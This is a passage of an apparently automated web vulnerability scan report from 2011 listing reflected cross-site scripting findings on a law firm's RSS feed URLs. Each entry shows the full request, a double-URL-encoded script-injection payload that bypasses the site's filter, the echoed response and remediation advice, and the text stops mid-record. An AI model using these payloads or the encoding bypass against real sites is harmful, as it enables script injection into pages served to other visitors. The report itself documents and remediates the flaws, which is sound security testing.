GET /rsse654b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4d67e0d85e/practices/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294 was submitted in the REST URL parameter 2. This input was echoed as 53a9f"><script>alert(1)</script>e2b7ff89294 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices53a9f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee2b7ff89294/Bankruptcy__Financial_Restructuring/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229 was submitted in the REST URL parameter 3. This input was echoed as 705db"><script>alert(1)</script>4b5b4bac229 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring705db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b5b4bac229/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 was submitted in the REST URL parameter 4. This input was echoed as a7f92"><script>alert(1)</script>7324d443b57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Bankruptcy__Financial_Restructuring/rss.xmla7f92%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7324d443b57 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150 was submitted in the REST URL parameter 1. This input was echoed as 413f8"><script>alert(1)</script>89fd6730150 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss413f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e89fd6730150/practices/Communications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e was submitted in the REST URL parameter 2. This input was echoed as 3fe4c"><script>alert(1)</script>24c5c30db8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices3fe4c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e24c5c30db8e/Communications/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2 was submitted in the REST URL parameter 3. This input was echoed as 21c62"><script>alert(1)</script>da39f0f31a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications21c62%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda39f0f31a2/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a was submitted in the REST URL parameter 4. This input was echoed as c659f"><script>alert(1)</script>72b7507567a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Communications/rss.xmlc659f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b7507567a HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650 was submitted in the REST URL parameter 1. This input was echoed as f366f"><script>alert(1)</script>a6a0233650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssf366f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6a0233650/practices/Corporate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb was submitted in the REST URL parameter 2. This input was echoed as 8174b"><script>alert(1)</script>fb0e9ce51eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices8174b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efb0e9ce51eb/Corporate/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b was submitted in the REST URL parameter 3. This input was echoed as 114fe"><script>alert(1)</script>550bbc6f87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate114fe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e550bbc6f87b/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 was submitted in the REST URL parameter 4. This input was echoed as 6f9cb"><script>alert(1)</script>495b8d11a77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Corporate/rss.xml6f9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e495b8d11a77 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f was submitted in the REST URL parameter 1. This input was echoed as d782d"><script>alert(1)</script>d2f1002c72f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rssd782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed2f1002c72f/practices/Election_Law__Government_Ethics/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232 was submitted in the REST URL parameter 2. This input was echoed as 8ddc1"><script>alert(1)</script>11d8c833232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices8ddc1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e11d8c833232/Election_Law__Government_Ethics/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3 was submitted in the REST URL parameter 3. This input was echoed as de06e"><script>alert(1)</script>97b01f23fb3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethicsde06e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e97b01f23fb3/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac was submitted in the REST URL parameter 4. This input was echoed as 6d35d"><script>alert(1)</script>1977a3e2ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Election_Law__Government_Ethics/rss.xml6d35d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1977a3e2ac HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b was submitted in the REST URL parameter 1. This input was echoed as 290f3"><script>alert(1)</script>18476e2452b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss290f3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e18476e2452b/practices/Employment__Labor/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732 was submitted in the REST URL parameter 2. This input was echoed as 9b5ec"><script>alert(1)</script>43dabe5a732 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices9b5ec%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43dabe5a732/Employment__Labor/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8 was submitted in the REST URL parameter 3. This input was echoed as e75a9"><script>alert(1)</script>28bea29faf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/practices/Employment__Labore75a9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e28bea29faf8/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:11:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e26b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea05a8e876db was submitted in the REST URL parameter 4. This input was echoed as 7e26b"><script>alert(1)</script>a05a8e876db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
